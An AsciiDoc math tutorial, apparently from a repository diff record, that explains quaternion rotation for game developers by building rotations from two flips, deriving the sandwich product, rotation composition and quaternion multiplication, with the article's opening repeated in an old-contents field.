then\n\n[stem]\n++++\n{q_a}{q_b}=(\\vec{a},0)(\\vec{b},0)=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\n++++\n\nIt is naturally derived from the general form, and we will be only using this multiplication in Part 1.\n\nWith flip multiplication defined, we can rewrite our flip composition rule again:\n\n*_Any 3D rotation stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\\vec{a},0)] and stem:[q_b=(\\vec{b},0)], such that_*\n[stem]\n++++\nq=-{q_b}{q_a}\n++++\n*_where stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}]._*\n\nYou might be thinking why it is not stem:[q= {q_a}{q_b}] instead. We will show where the order and the negative sign coming from in the proof.\n\nstem:[\\vec{a}\u00b7\\vec{b}=cos<\\vec{a},\\vec{b}>\\left|\\vec{a}\\right|\\left|\\vec{b}\\right|=cos\\frac{\u03b8}{2}]. Since stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and stem:[\\left|\\vec{v}\\right|=1], we have stem:[\\vec{a}\u00d7\\vec{b}=sin<\\vec{a},\\vec{b}>\\left|\\vec{a}\\right|\\left|\\vec{b}\\right|\\vec{v}=sin\\frac{\u03b8}{2}\\vec{v}].\n\nIf you are not sure about the direction of the cross product, see Figure 2.\n\n[stem]\n++++\n\\begin{align*}\nq&=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})\\\\\n&=(\\vec{a}\u00d7\\vec{b},\\vec{a}\u00b7\\vec{b})\\\\\n&=-(-\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\\\\\n&=(\\vec{b}\u00d7\\vec{a},-\\vec{a}\u00b7\\vec{b})\\\\\n&=-{q_b}{q_a}\n\\end{align*}\n++++\n\nHere you can also clearly see why we are using stem:[sin\u2061\\frac{\u03b8}{2}] and stem:[cos\u2061\\frac{\u03b8}{2}] in quaternions.\n\nOne thing I need to mention here is the negation of a quaternion. stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})], then\n\n[stem]\n++++\n\\begin{align*}\n{-q}&=(-sin\u2061\\frac{\u03b8}{2}\\vec{v},-cos\u2061\\frac{\u03b8}{2})\\\\\n&=(-sin\u2061\\frac{2\u03c0-\u03b8}{2}\\vec{v},cos\u2061\\frac{2\u03c0-\u03b8}{2})\\\\\n&=(sin\u2061\\frac{-(2\u03c0-\u03b8)}{2}\\vec{v},cos\u2061\\frac{-(2\u03c0-\u03b8)}{2})\\\\\n\\end{align*}\n++++\n\nRecall that stem:[sin\u2061\u03b8=sin(\u03c0-\u03b8)] and stem:[-cos\u2061\u03b8=cos(\u03c0-\u03b8)], then stem:[-sin\u2061\u03b8=sin(-\u03b8)] and stem:[cos\u2061\u03b8=cos(-\u03b8)].\n\nIt shows that stem:[-q] is a rotation along axis stem:[\\vec{v}] of angle stem:[-(2\u03c0-\u03b8)], which is exactly the same rotation as stem:[q]. For example if stem:[\u03b8=90^{\\circ}] then stem:[-(2\u03c0-\u03b8)=-270^{\\circ}], rotate stem:[90^{\\circ}] along axis stem:[\\vec{v}] is the same as rotate stem:[270^{\\circ}] degree but in the opposite direction along the same axis stem:[\\vec{v}]. \n\nThe fact that stem:[q] and stem:[\u2013q] represents the same rotation is usually called double-cover. However in our calculation I don\u2019t want you to simply think stem:[q] and stem:[\u2013q] are the same. They are different in quaternion space, even though they map to the same 3D rotation. The negative sign of the flip composition needs to be there.\n\nThe order of stem:[q=-{q_b}{q_a}] on the right hand side is important. It means flip along stem:[\\vec{a}] first and then stem:[\\vec{b}]. Actually all unit quaternion multiplication needs to be \u201cread\u201d from right to left when we are thinking about the order of applying those rotations.\n\n---\n.Side Note\n****\nWe can however get rid of the negative sign by choosing stem:[\\vec{a}] and stem:[\\vec{b}] differently.\n\n_Any 3D rotation stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\\vec{a},0)] and stem:[q_b=(\\vec{b},0)], such that\nstem:[q={q_b}{q_a}]\nwhere stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}-\u03c0]._\n\nIt becomes harder to visualize stem:[\\vec{a}] and stem:[\\vec{b}] if we go this way, and the negative sign does not really introduce a lot of difficulties, so we will stick with that negative sign in this article.\n\n****\n---\n\n\n=== Flip Vector\n\nGiven a flip stem:[q_a=(\\vec{a},0)] and vector stem:[\\vec{v}], we are ready to calculate the result of the flip stem:[\\vec{v'}].\n\n.Figure 3\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig3.png[, 400,align=\"center\"]\n\nAccording to flip definition, stem:[\\vec{v}], stem:[\\vec{a}] and stem:[\\vec{v'}] are on the same plane, and the angle stem:[<\\vec{v},\\vec{a}>=<\\vec{a},\\vec{v'}>].\n\nIf we treat stem:[\\vec{v}] and stem:[\\vec{v'}] as the axis of flip stem:[q_v=(\\vec{v},0)] and stem:[q_v'=(\\vec{v'},0)]. From our flip composition rule, flipping along axis stem:[\\vec{v}] then stem:[\\vec{a}] should give us the same rotation as flipping along axis stem:[\\vec{a}] then stem:[\\vec{v'}]. \n\nWe can actually calculate the result rotation. Let stem:[<\\vec{v},\\vec{a}>=<\\vec{a},\\vec{v'}>=\\frac{\u03b8}{2}], stem:[\\vec{u}=\\frac{\\vec{v}\u00d7\\vec{a}}{\\left|\\vec{v}\u00d7\\vec{a}\\right|}=\\frac{\\vec{a}\u00d7\\vec{v'}}{\\left|\\vec{a}\u00d7\\vec{v'}\\right|}]. Then the result rotation is of angle stem:[\u03b8] along axis stem:[\\vec{u}].\n\n[stem]\n++++\n\\begin{align*}\nq&=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})\\\\\n&=-{q_a}{q_v}\\\\\n&=-{q_v'}{q_a}\n\\end{align*}\n++++\n\nThis gives stem:[{q_v'}{q_a}={q_a}{q_v}].\n\n(Here stem:[\\left|\\vec{v}\u00d7\\vec{a}\\right|=\\left|\\vec{a}\u00d7\\vec{v'}\\right|=sin\\frac{\u03b8}{2}].If you are not sure what\u2019s going on here, go back \u201cFlip Composition\u201d and read the proof)\n\nNow we need to introduce the inverse of a quaternion. The inverse of stem:[q] is denoted as stem:[q^{-1}], such that stem:[qq^{-1}=q^{-1}q=(\\vec{0},1)]. \n\nstem:[I=(\\vec{0},1)] is called identity quaternion, means no rotation at all. You can think of stem:[I=(sin\u20610\\vec{v},cos\u20610)], which means rotating stem:[0^{\\circ}] along any axis stem:[\\vec{v}]. We haven\u2019t gone into quaternion multiplication or rotation composition, but it\u2019s not hard to see for any quaternion stem:[q], stem:[qI=Iq=q].\n\nIn the case of unit quaternion, the idea of inversed quaternion is if you apply a rotation, then apply its inverse, the result should be no rotation at all. And it is the same if you apply an inversed rotation then apply the original one.\n\nFor any unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})], then stem:[q^{-1}=(-sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. You can understand this in two ways, either stem:[q^{-1}=(sin\u2061\\frac{\u03b8}{2}(-\\vec{v}),cos\u2061\\frac{\u03b8}{2})] or stem:[q^{-1}=(sin\u2061\\frac{-\u03b8}{2}\\vec{v},cos\u2061\\frac{-\u03b8}{2})]. stem:[q^{-1}] is either a rotation of angle stem:[\u03b8] along axis stem:[-\\vec{v}], or a rotation of angle stem:[\u2013\u03b8] along axis stem:[\\vec{v}]. Either way it will cancel out the original rotation.\n\nI will give a quick proof in the case of flip. You can try extend this proof to general unit quaternion. If stem:[q_a=(\\vec{a},0)], stem:[q_a^{-1}=(-\\vec{a},0)], we have\n\n[stem]\n++++\n{q_a}{q_a^{-1}}=(\\vec{a}\u00d7-\\vec{a},-(\\vec{a}\u00b7-\\vec{a}))=(\\vec{0},1)\n++++\n\n(Make sure you understand the difference between stem:[q^{-1}] and stem:[\u2013q]. Read \u201cFlip Composition\u201d about quaternion negation if you are not sure.) \n\nWe can go back to previous result of flipping vector stem:[{q_v'}{q_a}={q_a}{q_v}]. Apply inverse flip of q_a on both side, the equation becomes\n\n[stem]\n++++\n\\begin{align*}\n{q_v'}{q_a}{q_a^{-1}}&={q_a}{q_v}{q_a^{-1}}\\\\\nq_v'&={q_a}{q_v}{q_a^{-1}}\n\\end{align*}\n++++ \n\nThis provides us a way to calculate the result of flip. Since we only need the vector part of the result, we can denote this as \n\n[stem]\n++++\n\\vec{v'}={q_a}\\vec{v}{q_a^{-1}}\n++++\n\nWhen we put a vector stem:[\\vec{v}] in quaternion multiplication, we are implicitly making that vector the axis of a flip to stuff it into a quaternion stem:[(\\vec{v},0)]. This is how the \u201csandwich\u201d multiplication form comes from, but only in the form of flip. We will prove that our result holds the same for any rotation in the next section.\n\n=== Rotate Vector\n\nWe know any 3D rotation stem:[q] can be broken down into 2 flips stem:[q= -{q_b}{q_a}], which means flipping along stem:[\\vec{a}] first and then stem:[\\vec{b}]. So for a vector stem:[\\vec{v}], we apply the first flip and get\n[stem]\n++++\n\\vec{v'}={q_a}\\vec{v}{q_a^{-1}}\n++++\nThen we apply the second flip stem:[\\vec{v'}] and get\n[stem]\n++++\n\\vec{v''}={q_b}\\vec{v'}{q_b^{-1}}\n++++\nSo the final result is\n[stem]\n++++\n\\begin{align*}\n\\vec{v''}&={q_b}{q_a}\\vec{v}{q_a^{-1}}{q_b^{-1}}\\\\\n&=({q_b}{q_a})\\vec{v}({q_b}{q_a})^{-1}\\\\\n&=(-q)\\vec{v}(-q^{-1})\\\\\n&=q\\vec{v}q^{-1}\\\\\n\\end{align*}\n++++ \nHere you can see why stem:[q= -{q_b}{q_a}] needs to be in this order.\n\nOne thing we need to prove\n[stem]\n++++\n\\begin{align*}\n{q_a^{-1}}{q_b^{-1}}&=(-\\vec{a},0)(-\\vec{b},0)\\\\\n&=(-\\vec{a}\u00d7-\\vec{b},-(-\\vec{a})\u00b7(-\\vec{b}))\\\\\n&=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\\\\\n&=(-\\vec{b}\u00d7\\vec{a},-\\vec{b}\u00b7\\vec{a})\\\\\n&=({q_b}{q_a})^{-1}\n\\end{align*}\n++++ \nAt this point, we fully explained how to rotate a vector using quaternion.\n\n=== Rotation Composition\n\nGiven rotation stem:[q_1] and stem:[q_2], from the formula in the previous section, if we rotate vector stem:[\\vec{v}] by stem:[q_1] first then by stem:[q_2], we have\n[stem]\n++++\n\\begin{align*}\n\\vec{v'}&={q_1}\\vec{v}{q_1^{-1}}\\\\\n\\vec{v''}&={q_2}\\vec{v'}{q_2^{-1}}\\\\\n&={q_2}{q_1}\\vec{v}{q_1^{-1}}{q_2^{-1}}\\\\\n&=({q_2}{q_1})\\vec{v}({q_2}{q_1})^{-1}\\\\\n\\end{align*}\n++++ \nIt is the same as apply the combined rotation stem:[q={q_2}{q_1}]. Be careful about the multiplication order.\n\nAgain we need to prove stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}], but we will do this later. This equation is actually very easy to understand in geometric term. We have a combined rotation stem:[q={q_2}{q_1}] that rotates stem:[q_1] first then rotates stem:[q_2]. If we want to undo this rotation, which means apply the inverse stem:[q^{-1}=({q_2}{q_1})^{-1}], we need to undo stem:[q_2] first then undo stem:[q_1], that is effectively stem:[q_1^{-1}q_2^{-1}].\n\nWhat does it really mean to combine 2 rotations, can we visualize the rotation axis and angle of the result? By converting rotations to flips we actually do that.\n\nLet stem:[q_1=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})], stem:[q_2=(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})], we need to choose a special flip break down, such that they share one flip: stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}]. \n\nCan we find such a break down? Remember the rule of flip composition requires the flip axis to be perpendicular to the rotation axis, that is stem:[\\vec{c}\u00b7\\vec{v_1}=0], stem:[\\vec{c}\u00b7\\vec{v_2}=0], we can choose stem:[\\vec{c}=\\frac{\\vec{v_1}\u00d7\\vec{v_2}}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}]. \n\nBased on stem:[\\vec{c}] we can find out the other two axes: rotate stem:[\\vec{c}] along axis stem:[\\vec{v_1}] by angle stem:[-\\frac{\u03b8_1}{2}] results in stem:[\\vec{a}]; rotate stem:[\\vec{c}] along axis stem:[\\vec{v_2}] by angle stem:[\\frac{\u03b8_2}{2}] results in stem:[\\vec{b}]. This process is demonstrated in Figure 4.\n\nNow we have stem:[\\vec{a}\u00b7\\vec{v_1}=0], stem:[\\vec{c}\u00b7\\vec{v_1}=0], stem:[<\\vec{a},\\vec{c}>=\\frac{\u03b8_1}{2}] and stem:[\\vec{c}\u00b7\\vec{v_2}=0], stem:[\\vec{b}\u00b7\\vec{v_2}=0], stem:[<\\vec{c},\\vec{b}>=\\frac{\u03b8_2}{2}]. Our break down stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}] is valid. The combined rotation can be written as\n[stem]\n++++\n\\begin{align*}\nq&={q_2}{q_1}\\\\\n&=(-{q_b}{q_c})(-{q_c}{q_a})\\\\\n&={q_b}({q_c}{q_c}){q_a}\\\\\n&=-{q_b}{q_a}\\\\\n\\end{align*}\n++++ \nHere we need to prove this\n[stem]\n++++\n{q_c}{q_c}=(\\vec{c},0)(\\vec{c},0)=(\\vec{c}\u00d7\\vec{c},-(\\vec{c}\u00b7\\vec{c}))=(\\vec{0},-1)=-I\n++++ \nIt shows that the combined rotation can be composed by flip stem:[q_a] and stem:[q_b], which tells the combined rotation is a rotation of angle stem:[2<\\vec{a},\\vec{b}>] along axis stem:[\\vec{u}=\\frac{\\vec{a}\u00d7\\vec{b}}{\\left|\\vec{a}\u00d7\\vec{b}\\right|}].\n\n.Figure 4\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig4.png[, 400,align=\"center\"]\nIn Figure 4, Blue plane is based on stem:[\\vec{v_1}] and stem:[\\vec{v_1}], stem:[\\vec{c}] is perpendicular to that plane. \nOrange plane is based on stem:[\\vec{a}] and stem:[\\vec{b}], the result rotation axis stem:[\\vec{u}] is perpendicular to that plane.\n\nWith the same method, let\u2019s prove the thing we left out:\n[stem]\n++++\n\\begin{align*}\n{q_1^{-1}}{q_2^{-1}}&=(-{q_c}{q_a})^{-1}(-{q_b}{q_c})^{-1}\\\\\n&={q_a^{-1}}{q_c^{-1}}{q_c^{-1}}{q_b^{-1}}\\\\\n&=-{q_a^{-1}}{q_b^{-1}}\\\\\n&=(-{q_b}{q_a})^{-1}\\\\\n&=({q_b}{q_c}{q_c}{q_a})^{-1}\\\\\n&=({q_2}{q_1})^{-1}\\\\\n\\end{align*}\n++++ \n\n=== Summary of Part 1\n\nIn Part 1, we covered the definition of quaternion stem:[q=(x,y,z,w)], the vector form of quaternion stem:[q=(\\vec{v},w)], unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] and how it is used to represent a rotation.\n\nWe also talked about negation of quaternion stem:[\u2013q], and its double cover property; the inverse of quaternion stem:[q^{-1}] and identity quaternion stem:[I=(\\vec{0},1)].\n\nWe use quaternion to represent flip stem:[q_a=(\\vec{a},0)], and derive the rule of flip composition stem:[q=-{q_b}{q_a}]. Based on this rule, we visualized and proved how quaternion rotates a vector by stem:[\\vec{v'}=q\\vec{v}q^{-1}] and how rotation gets composed by stem:[q={q_2}{q_1}].\n\nWe slightly touched quaternion multiplication, and we proved an important equation stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}].\n\n=== Appendix: Derive Quaternion Multiplication\n\nThis part is not very important for understanding quaternion. It is a bit calculation heavy and is more for fun. Feel free to skip.\n\nWe can actually derive the general quaternion multiplication from this special flip break down. That is if we define flip multiplication stem:[{q_a}{q_b}=(\\vec{a},0)(\\vec{b},0)=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})] directly, we can proof what general quaternion multiplication stem:[{q_1}{q_2}=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})] would look like.\n\nHere are some equations we will be using:\n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00d7(\\vec{b}\u00d7\\vec{c})&=(\\vec{a}\u00b7\\vec{c})\\vec{b}-(\\vec{a}\u00b7\\vec{b})\\vec{c}\\\\\n(\\vec{a}\u00d7\\vec{b})\u00b7(\\vec{c}\u00d7\\vec{d})&=(\\vec{a}\u00b7\\vec{c})(\\vec{b}\u00b7\\vec{d})-(\\vec{a}\u00b7\\vec{d})(\\vec{b}\u00b7\\vec{c})\\\\\n(\\vec{a}\u00d7\\vec{b})\u00d7(\\vec{a}\u00d7\\vec{c})&=(\\vec{a}\u00b7(\\vec{b}\u00d7\\vec{c}))\\vec{a}\n\\end{align*}\n++++ \n\nRecall how we choose the flip break down stem:[\\vec{c}=\\frac{\\vec{v_1}\u00d7\\vec{v_2}}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}].\n\nRotate stem:[\\vec{c}] along axis stem:[\\vec{v_1}] by angle stem:[-\\frac{\u03b8_1}{2}] we get\n[stem]\n++++\n\\vec{a}=cos\\frac{-\u03b8_1}{2}\\vec{c} + sin\\frac{-\u03b8_1}{2}(\\vec{v_1}\u00d7\\vec{c})=\\frac{1}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}(cos\\frac{\u03b8_1}{2}(\\vec{v_1}\u00d7\\vec{v_2}) - sin\\frac{\u03b8_1}{2}(\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\n++++\nRotate stem:[\\vec{c}] along axis stem:[\\vec{v_2}] by angle stem:[\\frac{\u03b8_2}{2}] we get\n[stem]\n++++\n\\vec{b}=cos\\frac{\u03b8_2}{2}\\vec{c} + sin\\frac{\u03b8_2}{2}(\\vec{v_2}\u00d7\\vec{c})=\\frac{1}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}(cos\\frac{\u03b8_2}{2}(\\vec{v_1}\u00d7\\vec{v_2}) + sin\\frac{\u03b8_2}{2}(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\n++++\nAnd we will have\n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00b7\\vec{b}&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00b7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))))\\\\\n&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00b7\\vec{v_2}){\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2})\\\\\n&=cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00b7\\vec{v_2})\n\\end{align*}\n++++ \n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00d7\\vec{b}&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7\\vec{v_2})\u00d7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\\\\\n&- sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00d7(\\vec{v_1}\u00d7\\vec{v_2})\\\\\n&- sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00d7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))))\\\\\n&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}\\vec{v_2} + sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}\\vec{v_1} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}(\\vec{v_1}\u00d7\\vec{v_2}))\\\\\n&=cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}\\vec{v_2} + sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}\\vec{v_1} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00d7\\vec{v_2})\n\\end{align*}\n++++ \nFrom the previous proof of rotation composition we know stem:[q={q_2}{q_1}=-{q_b}{q_a}], that is \n[stem]\n++++\n\\begin{align*}\nq&=(\\vec{a}\u00d7\\vec{b},\\vec{a}\u00b7\\vec{b})\\\\\n&=(cos\\frac{\u03b8_1}{2}(sin\\frac{\u03b8_2}{2}\\vec{v_2}) + cos\\frac{\u03b8_2}{2}(sin\\frac{\u03b8_1}{2}\\vec{v_1}) - (sin\\frac{\u03b8_1}{2}\\vec{v_1})\u00d7(sin\\frac{\u03b8_2}{2}\\vec{v_2}), cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2} - (sin\\frac{\u03b8_1}{2}\\vec{v_1})\u00b7(sin\\frac{\u03b8_2}{2}vec{v_2}))\n\\end{align*}\n++++ \nwhich is the definition of quaternion multiplication of stem:[{q_1}{q_2}=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})].\n\n","old_contents":"= An Easy Way to Understand Quaternion and Rotation: Part 1. Theory\nEric Zhang\n\n:stem: latexmath\n:figure-caption!:\n\n\nQuaternion is widely used in game engines to represent 3D rotation. As a game engineer you might be using quaternion explicitly or implicitly in your daily work, but do you really understand what is going on under the hood when you are calling \u201crotate a vector\u201d or \u201ccombine two rotations\u201d? Why rotating a vector stem:[v] by quaternion stem:[q] is calculated by a \u201csandwich\u201d multiplication: stem:[qvq^{-1}] ? Why rotating by quaternion stem:[q_1] then stem:[q_2] is in the reversed order: stem:[{q_2}{q_1}], and can you visualize the result rotation axis and angle?\n\nUnderstanding quaternions also leads to more efficient use of quaternion. For example, one common situation in game development is that we need an object to face its opposite direction. What we usually would do is to get the normal or forward vector, negate it, build a rotation out of it, and assign the rotation to the object. Later in this article we will see how much calculation we need to do in this process. However with the understanding of quaternion, we only need to do stem:[q=(q.y,-q.x,q.w,-q.z)], and I will show you why.\n\nIn this article, I will try to avoid touching the algebra structure of quaternion, or having to imagine a 4 dimensional hyper sphere. I will start with a special rotation operation: flip, and use that to visualize quaternion in a more accessible and geometrical way. This article will be split into 2 parts. In Part 1 we will talk about the idea of quaternion, understand and visualize how it rotates a vector and how to compose rotations. In Part 2 we will talk about how to make use of our understanding in Part 1, and how it is used in game engine versus rotation matrix and Euler angle.\n\nI would assume you are comfortable with 3D math (vector dot product and cross product) and basic trigonometry.\n\n=== Quaternion Definition\n\nQuaternion is a 4-tuple denoted as stem:[q=(x,y,z,w)]. The length of a quaternion is defined as stem:[\\left|q\\right| =\\sqrt{x^{2}+y^{2}+z^{2}+w^{2}}], just as you would expected from a 4D vector. \n\nIn order to represent 3D rotation, we have a constraint on the quaternions we use. But before that I want to introduce Euler\u2019s rotation theorem:\n\n*_Any rotation in 3D space is equivalent to a single rotation of angle stem:[\u03b8] along some axis stem:[\\vec{v}]._*\n\nWe can use quaternion to describe this angle-axis rotation : stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v}.x,sin\u2061\\frac{\u03b8}{2}\\vec{v}.y,sin\u2061\\frac{\u03b8}{2}\\vec{v}.z,cos\u2061\\frac{\u03b8}{2})], or in a more compact form stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. We call this form the vector form of a quaternion, and we will use this form throughout this article. You might be thinking why we are using stem:[\\frac{\u03b8}{2}] other than using stem:[\u03b8] directly. I will explain that in a later section.\n\nIt is easy to see the length of this quaternion stem:[\\left|q\\right|=\\sqrt{sin^{2}\\frac{\u03b8}{2}\\left|\\vec{v}\\right|^{2}+cos^{2}\\frac{\u03b8}{2}}=1]. (Remember the axis stem:[\\vec{v}] is a unit vector that stem:[\\left|\\vec{v}\\right|=1]). We call it a unit quaternion if the length stem:[\\left|q\\right|=1]. So we can rewrite Euler\u2019s rotation theorem in quaternion term:\n\n*_Any 3D rotation is equivalent a unit quaternion stem:[q] that stem:[\\left|q\\right|=1]._*\n\n---\n.Side Note\n****\nThis claim actually has 2 sides. Let me go a little be more in details in math term: \n(1). For any 3D rotation equivalent to a rotation angle stem:[\u03b8] along axis stem:[\\vec{v}], there exists a unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] to describe this rotation. \n(2). For any unit quaternion stem:[q=(x,y,z,w)], it describes a rotation of angle stem:[\u03b8=2cos^{-1}w] along axis stem:[\\vec{v}=\\frac{(x,y,z)}{\\sqrt{1-w^{2}}}].\n\n****\n---\n\nFrom now on, any quaternion stem:[q] used in this article is by default a unit quaternion, and we will use stem:[q] to describe rotations.\n\n=== Rotation and Flip\n\nNow let\u2019s forget quaternion for a minute, and focus on the nature of rotations. This part is the key to understand quaternion calculation in an easier way.\n\n*_Any 3D rotation can be composed by 2 flips along some axes._*\n\nThe reason we want to break down a rotation into flips, is that flips are much easier to think and calculate than general 3D rotation. We will start from flip and build our way to understand rotation.\nHere is a loose proof of this idea. We define counter-clockwise as the positive direction of rotation. First consider a special case. We have a rotation stem:[q], which rotates stem:[+90^{\\circ}] along axis stem:[\\vec{Z}]. Now I can say this rotation is the same as 2 flips along axis stem:[\\vec{a}] and stem:[\\vec{b}], both of them are on XY plane, and the angle from stem:[\\vec{a}] to stem:[\\vec{b}] is stem:[+45^{\\circ}].\n\n.Figure 1 (a)\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig1.png[, 300,float=\"right\",align=\"center\"]\n.Figure 1 (b)\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig1_b.png[, 300,float=\"right\",align=\"center\"]\n\nWe demonstrate this through Figure 1. For any vector stem:[\\vec{v}], the result of this rotation is stem:[\\vec{v''}] , which is the same as flip stem:[\\vec{v}] along axis stem:[\\vec{a}] and get stem:[\\vec{v'}], and then flip stem:[\\vec{v'}] along axis stem:[\\vec{b}] and get stem:[\\vec{v''}]. \n\nIt doesn\u2019t matter where stem:[\\vec{a}] and stem:[\\vec{b}] are on the XY plane, but the order must be kept. If we choose stem:[\\vec{b}] by rotating stem:[\\vec{a}] along axis stem:[\\vec{Z}] by stem:[+45^{\\circ}] with the positive direction we defined above, then we must flip along stem:[\\vec{a}] first then along stem:[\\vec{b}] to get our target rotation. The order and the sign of angle is important, as you can easily see flip along stem:[\\vec{b}] first then along stem:[\\vec{a}] will give a different result.\n\nIt\u2019s not hard to generalize to a rotation of any angle stem:[\u03b8] along stem:[\\vec{Z}] axis. And in this case, the angle from stem:[\\vec{a}] to stem:[\\vec{b}] is stem:[\\frac{\u03b8}{2}].\n\nWhat if the axis is not stem:[\\vec{Z}] axis but any unit vector stem:[\\vec{u}] ? It turns out to be very straight forward. stem:[\\vec{a}] and stem:[\\vec{b}] are no longer on XY plane but on a plane cross the origin and perpendicular to stem:[\\vec{u}], as in Figure 2.\n\n.Figure 2\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig2.png[, 400,align=\"center\"]\n\nNow we can rewrite our flip composition rule in a more specific form:\n\n*_Any 3D rotation equivalent to rotating angle stem:[\u03b8] along axis stem:[\\vec{v}] can be represented as a sequence of 2 flips along axis stem:[\\vec{a}] and stem:[\\vec{b}], such that stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: 